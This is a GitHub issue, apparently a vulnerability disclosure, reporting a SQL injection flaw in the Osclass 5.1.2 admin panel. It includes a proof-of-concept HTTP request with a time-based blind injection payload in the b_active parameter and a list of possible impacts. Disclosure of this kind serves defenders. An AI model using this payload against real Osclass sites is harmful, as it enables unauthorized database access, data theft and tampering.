search

mindstellar / Osclass

With Osclass, get your own classifieds site for free. Build your own Osclass installation and start advertising real estate, jobs or whatever you want- in minutes!
https://docs.mindstellar.com/
GNU General Public License v3.0
88 stars 49 forks source link

Osclass 5.1.2 has a SQL Injection Vulnerability #495

Closed Hebing123 closed 6 months ago

Hebing123 commented 8 months ago

Summary

Osclass 5.1.2 has a SQL Injection Vulnerability.

Details

An attacker with administrator rights can execute commands through SQL injection.

Proof of Concept (POC)

GET /oc-admin/index.php?b_active=(select(0)from(select(sleep(4)))v)&b_enabled=0&b_premium=1&b_spam=1&catId=10&city=San%20Francisco&cityId=San%20Francisco&countryId=USA&countryName=hebing123&direction=desc&iDisplayLength=10&page=items&region=NY&regionId=NY&sSearch=the&sort=date&user=hebing123&userId=hebing123 HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: osclass=b44r3de2iae3vmvm8at026v7vu; 54f78354eccc6e15622d3aaeccf02ca2=oc_adminId._.oc_adminSecret._.oc_adminLocale._.listing_iDisplayLength%261._.v5qMg6iJ._.en_US._.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: 192.168.160.147
Connection: Keep-alive

image

image

Impact

  1. Leakage of user privacy informationstored in the database;
  2. Tamper with some web pages byoperating the database;
  3. modify the value of some fieldsin the database, embed the network horse link, and mount the horse attack;
  4. the database server was maliciouslyoperated, the system administrator account was tampered with;
  5. the database server providesoperating system support, so that hackers can modify or control the operating system.